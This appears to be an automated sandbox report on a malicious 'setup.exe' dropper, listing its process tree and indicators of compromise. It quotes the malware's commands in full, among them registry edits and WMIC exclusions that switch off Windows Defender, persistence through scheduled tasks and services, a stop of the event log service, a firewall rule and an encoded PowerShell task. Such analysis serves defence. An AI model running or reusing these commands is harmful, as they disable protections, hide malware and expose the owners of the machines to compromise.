QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 
2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory 
of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 2272 wrote to memory of 2892 2272 jNFCat12JprTAJuHReQN2XR8.exe schtasks.exe -
outlook_office_path 1 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exe description ioc process
Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe
-
outlook_win_path 1 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exe description ioc process
Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe
Processes
-
C:\Windows\system32\cmd.exe cmd /c C:\Users\Admin\AppData\Local\Temp\file.rar 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar 2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar 3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\VideoLAN\VLC\vlc.exe "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\file.rar" 4⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4 1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401 1⤵
-
C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\file\" -spe -an -ai#7zMap23962:88:7zEvent1601 1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe "C:\Users\Admin\AppData\Local\Temp\file\setup.exe" 1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exe C:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exe 2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe .\Install.exe 3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS13CF.tmp\Install.exe .\Install.exe /hsdidPpAQu "385135" /S 4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" 5⤵
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" 6⤵
-
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 7⤵
-
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 8⤵
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" 6⤵
-
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 7⤵
-
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 8⤵
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" 6⤵
-
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 7⤵
-
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 8⤵
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" 6⤵
-
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 7⤵
-
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 8⤵
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" 6⤵
-
C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force 7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force 8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force 9⤵
-
C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" 5⤵
-
C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True 6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True 7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True 8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bKPbLIPtdWjYWtgKbM" /SC once /ST 20:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe\" M5 /dNcdidaLlL 385135 /S" /V1 /F 5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM" 5⤵
-
C:\Windows\SysWOW64\cmd.exe /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM 6⤵
-
\??\c:\windows\SysWOW64\schtasks.exe schtasks /run /I /tn bKPbLIPtdWjYWtgKbM 7⤵
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 592 -s 604 5⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exe C:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exe 2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exeC:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\ProgramData\DBKKFHIEGD.exe"C:\ProgramData\DBKKFHIEGD.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 685⤵
- Loads dropped DLL
- Program crash
-
C:\ProgramData\BFHJECAAAF.exe"C:\ProgramData\BFHJECAAAF.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 485⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HIIEBAFCBKFI" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exeC:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hkdooxyy.exe" C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create vmffvbwj binPath= "C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description vmffvbwj "wifi internet conection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vmffvbwj3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exeC:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\aj2A10.exe"C:\Users\Admin\AppData\Local\Temp\aj2A10.exe" /relaunch=8 /was_elevated=1 /tagdata3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Modifies system certificate store
-
C:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exeC:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exeC:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp"C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp" /SL5="$20278,5623997,54272,C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exeC:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe"C:\Users\Admin\AppData\Local\Temp\file\setup.exe"1⤵
- Executes dropped EXE
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exeC:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Windows security bypass
- Sets service image path in registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1581770322206360436-18189707221070211951-1484361193-533777962-19874667411007098208"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {2FF7B39F-64EE-42D4-9F27-6430FAF2A4E4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exeC:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNWllnHpu" /SC once /ST 13:45:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
